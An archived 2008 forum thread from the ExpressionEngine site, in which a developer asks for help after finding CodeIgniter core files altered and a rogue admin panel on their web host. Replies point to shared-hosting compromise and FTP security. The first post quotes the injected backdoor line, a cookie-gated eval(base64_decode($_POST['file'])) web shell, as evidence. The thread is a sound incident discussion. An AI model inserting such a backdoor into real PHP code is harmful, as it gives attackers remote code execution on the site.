We use cookies to help make our site work properly and to analyze how our site is used. Some are optional, but none contain your personal information, and we don't use any for ads. You can view our cookies policy, manage your cookie preferences, or consent and dismiss this banner by clicking agree:

Agree
ExpressionEngine CMS
Open, Free, Amazing

Thread

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

The active forums are here.

Possible hack, any advice?

April 15, 2008 2:42pm

Subscribe [4]

  • #1 / Apr 15, 2008 2:42pm

    kilishan

    183 posts

    The other day I noticed that a placeholder account for a webapp I’m working on over at http://critormiss.com starting spitting out errors and refusing to work. The strange thing was that I haven’t made any changes in a while. I’ve searched the internet and seem a number of other sites recently getting the same errors.

    Basically, at the top of several of my CI base classes (like Loader.php, CodeIgniter.php, config/url_helper, etc) the opening line has been modified to read: 

    <?php if(md5($_COOKIE['_wp_debugger'])=="cd15478ffb4a49eece991be29cdf8f64"){ eval(base64_decode($_POST['file'])); exit; } ?><?php  if (!defined('BASEPATH')) exit('No direct script access allowed');

    I also found a new file (simply called _new.php) in /server/ directory. I’ve renamed it and can provide it anyone wants to browse through.

    My .htaccess file is:

    RewriteEngine on
RewriteCond $1 !^(index\.php|public|tmp|robots\.txt)
RewriteRule ^(.*)$ /index.php/$1 [L]

    Anyone know how they might have modified the files, and how I can keep them from doing it again?

    Thanks!

  • #2 / Apr 15, 2008 3:06pm

    Tom Glover

    493 posts

    I never seen a hack like this. I’m confused but I’m sure someone else in the forum will have a clue on how thye are doing it.

  • #3 / Apr 15, 2008 3:10pm

    kilishan

    183 posts

    The thing that really makes me nervous is I just found a admin directory in my “public directory” (which typically holds my css, etc) that has an admin control panel of sorts that allowed them to run php and cmd scripts, analyse other weakness etc. Looks like it all happened on the 10th and 11th. I’ve renamed it and made the host aware, but really wish I knew how they got in.

  • #4 / Apr 15, 2008 3:12pm

    Référencement Google

    651 posts

    Are you alone to work on your server? Did you ever gave your password to some friends? Is your FTP access secure enough and with a strong password that nobody could guess?

  • #5 / Apr 15, 2008 7:17pm

    Derek Allard

    3168 posts

    That reeks badly of a poorly configured and protected host.  I see these all the time when doing EE support.  First of all, look through all directories with writable permissions for other files that don’t belong.  Next up, contact your host and ask them for more information.  Nearly all hosts will be able to tell you what happened.

    The classic situation here is that you’re on a shared server (not uncommon, nor bad by default) and another user on the same server has escalated their privs to be able to get at your account.  It may be a simple fix, or it may be time to switch hosts 😉  Wait and see what their response is.

    To be clear, I’m NOT saying your host is to blame (but I’m sure thinking it loudly).

  • #6 / Apr 15, 2008 7:26pm

    Firestorm ZERO

    26 posts

    Most likely this…

    http://wordpress.org/support/topic/168964

.(JavaScript must be enabled to view this email address)

ExpressionEngine News!

#eecms, #events, #releases

© Packet Tide, All Rights Reserved. Legal Notices

Username

Password

Forgot password?
or Register